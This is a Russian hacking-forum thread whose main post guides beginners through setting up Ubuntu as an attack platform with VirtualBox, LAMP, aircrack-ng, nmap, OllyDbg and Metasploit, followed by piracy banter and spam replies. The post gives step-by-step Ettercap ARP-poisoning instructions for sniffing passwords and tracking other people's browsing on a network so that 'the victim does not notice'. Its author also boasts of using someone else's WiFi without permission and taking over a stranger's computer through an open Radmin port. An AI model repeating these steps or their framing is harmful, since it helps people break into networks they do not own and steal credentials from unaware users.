Чтобы разблокировать и поставить пароль на учётную запись root вам нужно
System--Администрирование--Пользователи и группы--нажать на root и потом на кнопку unlock(после чего вас попросят
ввести ваш пароль(от вашей учётной записи))
После того как ввели пароль....вы можете изменять настройки учётной записи root (нам нужно поставить пароль).
Нажимаем на root и потом Properties -- Password (вводите ваш пароль на учётную запись 2 раза)--OK
всё. теперь мы можем выполнять команды от пользователя root

Возвращаемся к установке ....жмём install нас просят пароль от root.... вводим....и выполняем установку.....после
того как мы установили перезагружаем компьютер и видим во вкладке Applications--Системные
Sun xVM VirtualBox это и есть наша программа.....теперь надо сделать чтобы наш пользователь мог пользоваться этой
программой....
System--Администрирование--Пользователи и группы--Unlock--Manage Groups -- (ищите vboxusers)--Propetis--и ставите
галку над вашим пользователем и над root....теперь можно приступать....

VirtualBox
Открываем Sun xVM VirtualBox и попробуем установить Windows XP
Создать--Далее--Даёте любое имя(у меня Xwindows) тип ОС Mirosoft Windows версия Windows XP--Далее(размер основной
памяти можете оставить как есть)--Создать(Динамически расширяемый образ диска)ставите сколько вам нужно места под
винду...жмёте Далее--Готово

После чего в основном окне появится Xwindows--жмём Свойства--CD/DVD-ROM--Подключить CD/DVD(далее если вы устанавливаете
Windows с диска то
Физический CD/DVD-привод , а если с образа (iso) то Файл ISO-образа (и выбираете путь где находится этот образ)--ОК
Далее жмёте старт....и устанавливаете по такой же схеме как обычно....

После того как вы установили Windows и загрузитесь.....(попробуйте вставить флешку).....}=) и увидите ,что эту
флешку Винда не видит....выполните эти действия и у вас всё получится...
http://jedi-linux.blogspot.com/2008/03/ … albox.html тут всё подробно описано....

Второй очень нужный нам момент это взаимосвязь Ubuntu и Windows , а именно....общяя папка(разшаренная папка)(для
того чтобы мы могли быстро перекидываться файлами...)
Делается это очень просто....
1)Когда мы находимся в Windows жмём Ctrl+Home и выходим с полноэкранного режима--Машина--Полноэкранный режим
После чего у вас появятся в верхнем поле такие поля Машина, Устройства, Справка.
2)Жмём Устройства--Установить дополнения Гостевой ОС(устанавливаем эти дополнения и выключаем вирт машину...)//
Кстати в этом пункте (Устройства вы можете в реальном времени подключать и отключать устройства от ОС)
3)Далее идём в вашу корневую папку...(на убунту) она еще называется Home Folder и создаём там папку под
названием full (имя можете поменять если хотите)
4)Заходим в Sun xVM VirtualBox--Xwindows--Свойства--Общие папки--(нажимаем на папку с плюсиком)--Путь к
папке(Другой) и выбираем путь до папки....у меня он получился такой /home/xakep9009/full--Ок
5)Загружаем Винду и вот что делаем...
Пуск--Выполнить-- net use x: \\vboxsvr\full   <-имя папки -- Ok
После чего у вас появится "Сетевой диск"(тобишь папка которая будет работать как в Ubuntu так и в Windows)

VirtualBox мы с вами настроили....теперь как истинные Хакеры мы должны установить MySQL+PHP+Perl+phpMyadmin для
наших опытов...(в Linux эта связка называется LAMP)

LAMP

Для того чтобы с лёгкостью установить сервер....(localhost) нам нужно иметь подключение к интернету....(поэтому в
большей степени повезёт тем у кого ноутбуки...с настройкой WiFi им париться не придётся.....ну а если у вас
декстоп....придётся помучиться и полазят по форумам....ибо у каждого собственные настройки...)

Уточняю (если вы всё еще не отошли от виртуальных машин) дальнейшие действия происходят в Ubuntu.

Открываем консоль(командная строка)....

Applications--Стандартные--Терминал

После чего в терминале пишем....

sudo apt-get install lamp-server^

Пишем пароль который вы ставили для пользователя root....и жмём Enter
Вот и всё! Теперь у нас работает PHP и MySQL (кстати perl в Ubuntu по умолчанию уже есть....)

Если вы еще не знаете(или не помните) что означают эти команды....то давайте разберём....так как они у вас будут
встречаться очень часто
1)sudo -это команда для того чтобы выполнять действия от пользователя root
(если бы мы её не написали...нам бы выдали ошибку...что у нас мало прав на выполнение установки....эта команда
всегда используется когда надо отредактировать или установить файлы.....)
2)apt-get install -эта команда для установки пакетов которые располагаются в репозитариях(в убунту по дефалту уже
существует некоторое количество стандартных репозитариев....)
Чтобы было легче понять....приведу пример...
На серваки\репозитарии лежит файл....который называется mc...вам надо его установить...и вместо того чтобы лазить
по интернету и искать его....вы можете набрать sudo apt-get install mc (после чего ваш комп начнёт рыскать по
репозитариям и если он найдёт такой файл...он начнёт его устанавливать...(кстати установите эту программу она
очень удобная и нужная....чтобы открыть её нужно в командной строке написать mc)
\\Добавлять репозитарии вы можете вручную для этого...System--Администрирование--Источники приложений--Third-
Party Software--+Add

Ну и еще один пример для закрепления....
Когда вам надо будет отредактировать системный файл...или файл с повышенными правами
то делаем это так sudo gedit '\var\somefile.x'
Где gedit это стандартное приложение для редактирования текстовых документов...(по сути мы могли бы просто
щёлкнуть два раза по somefile.x и начать его редактировать...но как только мы захотели бы его сохранить нас
бы послали....на ошибку ^^.

Извините что пришлось к этому возвращаться....но это очень важный момент который вам еще много раз поможет...
и так....отлично localhost у нас работает....но не будем же мы работать с MySQL без PhpMyAdmin....

sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin

После чего у нас будет рабочий phpmyadmin проверить это можно набрав в браузере http://localhost/phpmyadmin
Сам сайт располагается в этой дерриктории /var/www

После этого как уважающий себя хакер мы должны установить пакет aircrack-ng (для взлома Wifi Сетей)
Взлом Wifi сетей я описывал тут http://forum.xakep.ru/m_1224792/mpage_6/key_/tm.htm
А установка делается очень просто....

sudo apt-get install aircrack-ng

Ну и естественно как мы можем узнать кого нам надо атаковать если у нас нету сканера сетей....nmap - это сканер
локальных сетей устанавливается и используется очень легко....

sudo apt-get install nmap     //Это установка

nmap 192.168.1.1-225       //Это использование

(после чего он начинает сканировать сеть на наличие подключённых компов и выводит IP этих компов....и открытые
порты!)
Приведу пример....после того как я "позаимствовал" WiFi сеть....я первым делом начинаю сканирование на наличие
подключённых компов....и для того чтобы определить на каком IP расположен роутер.....
Так вот просканировав сеть я обнаружил комп с открытым портом от Radmin`a я установил клиент Радмина и сидел
получил полный доступ к этому компу....(вплоть до Рабочего стола)
Так же у nmap`a есть много настроек.....которые вы можете посмотреть через help. // nmap --help

Бывает так что времени нету или нет охоты.... на загрузку Виртуальной машины для единственной программы....
допустим utorrent.....
Для этого случая у нас есть замечательная вещь как Wine(оно же вино)

Wine
Это мини эмулятор Windows XP под Linux .....
(скорее сказать что она эмулирует файловую систему)

sudo apt-get install wine

После чего у вас в Applications появится раздел Wine.....
Теперь для примера скачайте WinRAR и установите его....(это пожалуй первая нужная программа(имеется ввиду
расширение) которая не потдерживается "менеджером архивов")

Ну и хакерскую программу которую должен иметь при себе Cracker это отладчик ollydbg даже если вы не знаете
Ассемблер она всегда должна быть при вас....так как всегда есть вероятность что вы встретите Криса Касперски
и он вам покажет пару трюков ^^
http://www.ollydbg.de/version2.html

Единственный недостаток из-за которого мы всё еще привязаны к Windows это то что Wine в некоторых случаях не
может установить (корректно) программу.//Это в том случае если программа глобальная....как Word, Photoshop итд....
хотя программа развивается....

Следующий и очень важный для нас инструмент будет Ettercap который мы можем установить из стандартного набора
программ.....(кстати обратите внимание на него....там очень много полезных программ которые мы можем скачать)

Applications--Установка\Удаление--Интернет(и тут ищем программу Ettercap)--ставим галку напротив неё--Apply
Changes

После этого эта программа будет установлена и мы сможем её найти в

Applications--Интернет

Запускаем её и с нас требуют пароль администратора....так как эта программа связанна с WiFi карточками.....

Ettercap

Эта программа производит ARP spoofing благодаря которому мы можем "ловить" пароли пролетающие в сети.....
Подробнее о ARP spoofing можно прочесть тут
http://ru.wikipedia.org/wiki/ARP-spoofing

А если коротко об этой атаке....то наш компьютер притворяется роутером....и все пакеты посылаются нам....после
чего мы их декодируем.....(фильтруем то что нам нужно и сохраняем у себя...)и в это же время перенаправляем эти
пакеты настоящему роутеру....(чтобы жертва не заметила подвоха)

именно эти действия выполняет Ettercap....
Теперь давайте рассмотрим как это можно сделать...
Открываем Ettercap(в графическом виде) и настраиваем его на атаку....

Sniff--Unifide Sniffing(выбираем интерфейс который подключен к сети которую будем атаковать , о как
закрутил =D)
//p.s узнать какие у вас вообще есть интерфейсы можно набрав в консоли airmon-ng
У меня этот интерфейс eth1--ОК

Теперь нам нужно найти роутер и машины которые нам надо снифать.....

Hosts--Scan for hosts
Теперь открываем лист хостов....
Hosts--Hosts list
Роутеры обычно располагаются на таких адресах 192.16.1.1 или 192.168.1.254
или если админ продвинутый и поставил роутер на какой-то другой IP мы можем всегда воспользоваться nmap и
вычислить это.....(если мы увидим что у кого то открыт 80 порт -порт http сервера...)
И так определили роутер....в моём случае он располагается 192.168.1.1 и добавляем его в Target 1 Все
остальные машины добавляем в Target 2

Ну а теперь когда мы навели прицел на атакующих надо выбрать что нам нужно от них(снифаннье паролей или может
чтобы не доходили до них пакеты...итд)
Делается это так...
Plugins--Manage the Plugins(и тут мы выбираем вид атаки....)
для того чтобы перехватывать пароли выбираем плагин pptp_pap
Жмём два раза на него....и он включается.....

Activating pptp_pap plugin...
pptp_pap: plugin running...

Но мы еще не начали атаку....теперь чтобы начать жмём
Mitm--ARP Poisoning(и ставим галку Sniff remote connections)--ok

Ну и наконец Start--Start Sniffing
Всё теперь сидим и ждём....наши пароли....кстати так же вы можете следить за пользователем....(куда он
переходит по ссылкам) для этого вам надо включить еще один плагин remote_browser 1.2
Единственный недостаток этого плагина ...это если ссылка слишком большая то Ettercap сам делает своё
окно на весь экран....и прикрыть его нельзя....

Ну и естественно имея Ubuntu как я могу не рассказать о такой фишке как
Compiz Fusion lcon
Это программа для улучшения твоего рабочего стола....
Но слово улучшение.....тут не уместно.....
Твой рабочий стол становится очень удобным и красивым....
В этот пакет входит такая фишка как 3D Descktop (тобишь куб)....и еще много много разных эффектов....
посмотреть которые вы можете тут
http://www.youtube.com/watch?v=ZxfSwzhS … re=related
Скачать эту программу можно с Applications--Установка\Удаление--(В поиске во всех программах вбиваете Compiz)

Metasploit framework

Ну и наконец самая известная хакерская тулза.....это МЕТАСПЛОЙТ
Метасплойт представляет из себя огромную базу данных эксплойтов....которые, междупрочим можно запускать....
указав всего несколько параметров.....этот инструмент я буду рассматривать отдельно....
Пока вам надо его установить....ну и при желании самим покапаться в нём.....

В терминале набираем.....
sudo apt-get install ruby libruby rdoc
apt-get install libyaml-ruby
apt-get install libzlib-ruby
apt-get install libopenssl-ruby
apt-get install libdl-ruby
apt-get install libreadline-ruby
apt-get install libiconv-ruby
apt-get install rubygems *
apt-get install libgtk2-ruby libglade2-ruby

Естественно это каждая команда по отдельности.....
После чего вам надо скачать сам пакет.....
http://metasploit.com/framework/downloa … 3.2.tar.gz
Разархивировать..... и всё.... Metasploit установлен....

Ну и совсем уж напоследок.....раскажу парочку фишек....для новичков в Linux
1)Команда su  в терминали означает что ты хочешь все остальные операции(в терминале) производить от
пользователя root
как пример это делается для того чтобы несколько раз не писать sudo....
2)Команда top это просмотр выполнения процессов....(аналог в Windows Ctrl+alt+del)
3)Команда kill (номер PID) это убивает процесс...допустим firefox заглючила....и не хочет отключаться....
открываешь командную строку....в ней пишешь top (там ищешь PID firefox`a) (останавливаешь команду top....
нажав ctrl+C //кстати так можно делать со всеми командави....допустим ping точно так же можно остановить...)
И узнав номер PID firefox`a который равнялся 39994 мы убиваем этот процесс
kill 39994  .
4)Команда cd (передвижение по деррикториям)
5)Команда chmod служит для раставления прав.....
допустим какой то файл или папка доступна только root...а мы хотим сделать его\её доступным для всех....
(записи и чтения)

sudo chmod 777 '/var/lol/somefile_or_dir'

6)Команда rm (remove) переводится как удаление.....что бы это могло быть? =)
Пример
rm '/var/lol/somefile.x'

7)Команда history используется для просмотра всего...что вбивалось в командную строку....ох весёлая
история была у меня с этой командой...

8)Удаление программы
Пример: sudo apt-get remove aircrack-ng

Помните...если вы не знаете что означает та или иная команда ....вы можете всегда посомтреть.....
sudo --help
rm --help
ping --help
итд......
иногда может быть так
man man
man help
man ping ......

Вывод

И так мы с вами узнали
1)Какой инструментарий используется при нападении.
2)Поняли на сколько лёгок Linux в изучении....и насколько легко устанавливать различные известные пакеты...
3)Узнали\Повторили несколько команд из терминала...
4)Поняли как работают репозитарии
5)Рассмотрели такой вид атаки как ARP spoofing
6)И наконец собрали себе боеспособную ОС.

___________________________________________________________________________
Очень бы хотелось чтобы вы смогли на практике проделать всё что я описал.....так как практика это саоме ценное...
может быть что с первого раза может всё не получиться .....но уверен что получиться!
Во всяком случае старайтесь сидеть под Ubuntu когда вы в ICQ или сёрфать.....
старайтесь использовать WIndows только в том случае если вам надо напечатать документ....и нужного драйвера нету...
или для игры в CS (для игр в целом........вероятность потери паролей сокращается с 88% до 8% =)

0

11

Учебники и справочники: HTML, PHP, LINUX

PHP:
PHP. Как сделать современный веб-сайт ,  Руководcтво по РНР 3.0

HTML:
Учебник по HTML

UNIX:
Учебник по Linux 1.0

0

12

Argen Invincible написал(а):

Программы для тюряги вк

Они работают?

0

13

Там пишет запрашиваемая страница не существует!

0

14

ЫысТоРиК уясни, тут всё пиратское и программы пиратские, и вобще я пират.

0

15

Argen Invincible написал(а):

ЫысТоРиК уясни, тут всё пиратское и программы пиратские, и вобще я пират.

Ты пират без головы Ггы) http://s017.radikal.ru/i408/1111/4d/d7597eae1c1e.gif

0

16

ЫысТоРиК написал(а):

Ты пират без головы Ггы)

Нет, без глаза, руки и ноги, но с головой >_<

http://smilesworld.ucoz.ru/_ph/34/1/78420875.jpg

0

17

Argen Invincible написал(а):

Нет, без глаза, руки и ноги, но с головой >_<

Значит ты папугай более сильнейших пиратов  http://s017.radikal.ru/i408/1111/4d/d7597eae1c1e.gif

0

18

ЫысТоРиК написал(а):

начит ты папугай более сильнейших пиратов

Чё? Я как тот медведь в первом посте Arg!

0

19

Argen Invincible написал(а):

Чё? Я как тот медведь в первом посте Arg!

http://s017.radikal.ru/i416/1111/20/9bd798fa9e9c.gif

0

20

Hi! This is my first visit to your blog! We are a fddegbkdfdcdbdde

0

21

Very nice site!

0

22

Very nice site!

0

23

Very nice site!

0


Вы здесь » АРХИВ » SoFT » Взлом, программы для взлома, Хакерство